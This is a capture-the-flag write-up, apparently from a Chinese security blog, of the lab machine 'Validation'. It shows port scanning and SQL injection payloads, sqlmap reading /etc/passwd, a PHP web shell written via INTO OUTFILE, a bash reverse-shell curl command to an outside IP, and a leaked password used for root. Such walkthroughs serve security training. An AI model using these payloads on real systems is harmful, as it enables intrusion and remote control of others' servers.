Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.11.116 | TCP:22,80,4566,8080 |
$ ip='10.10.11.116'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d8f5efd2d3f98dadc6cf24859426ef7a (RSA)
| 256 463d6bcba819eb6ad06886948673e172 (ECDSA)
|_ 256 7032d7e377c14acf472adee5087af87a (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
4566/tcp open http nginx
|_http-title: 403 Forbidden
8080/tcp open http nginx
|_http-title: 502 Bad Gateway
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SQLI
http://10.10.11.116/account.php
![[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图](https://img.4awl.net/img/e1/821d3d560dacf4ea1d923cc7cebb3b.jpg "[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图")
![[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图1](https://img.4awl.net/img/50/28ff8e51218b4849cdb035e67f471c.jpg "[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图1")
![[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图2](https://img.4awl.net/img/e4/ddcf1432f658848548cc6558ca5675.jpg "[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图2")
username=x&country=' UNION SELECT 1--+
![[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图3](https://img.4awl.net/img/56/95d8427cd8493936a56ff880ba6970.jpg "[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图3")
username=x&country=' ORDER BY 1--+
字段为1
$ python3 /home/maptnh/sqlmap-dev/sqlmap.py -r sql --batch --level 5 --risk 3 -p 'country'
![[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图4](https://img.4awl.net/img/45/2334921d2824e6a23a45dbd23c4e59.jpg "[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图4")
$ python3 /home/maptnh/sqlmap-dev/sqlmap.py -r sql --batch --level 5 --risk 3 -p 'country' --file-read='/etc/passwd'
![[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图5](https://img.4awl.net/img/fd/d00ff7d90d9131095d5dc3dca8e4cc.jpg "[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图5")
username=x&country=' UNION SELECT "<?php SYSTEM($_REQUEST['shell']); ?>" INTO OUTFILE '/var/www/html/shell.php'-- -
![[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图6](https://img.4awl.net/img/27/e9535cea16dba8f69afe8d1e897818.jpg "[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图6")
$ curl 'http://10.10.11.116/shell.php' --data-urlencode "shell=/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.28/445 0>&1'"
![[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图7](https://img.4awl.net/img/cc/73fc1a6517b0a797ba75874e18f382.jpg "[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图7")
User.txt
3ac2b2e772e3990b49e4bff189e72540
Privilege Escalation
![[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图8](https://img.4awl.net/img/9e/9f2bc305ecf6e54222ef55491cd679.jpg "[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图8")
uhc-9qual-global-pw
![[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图9](https://img.4awl.net/img/6c/5c53349d88207360f8a8f095e5c383.jpg "[Meachines] [Easy] Validation SQLI+信息泄露权限提升插图9")
Root.txt
c9c56229660a90c2f45caebacb21ecff
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
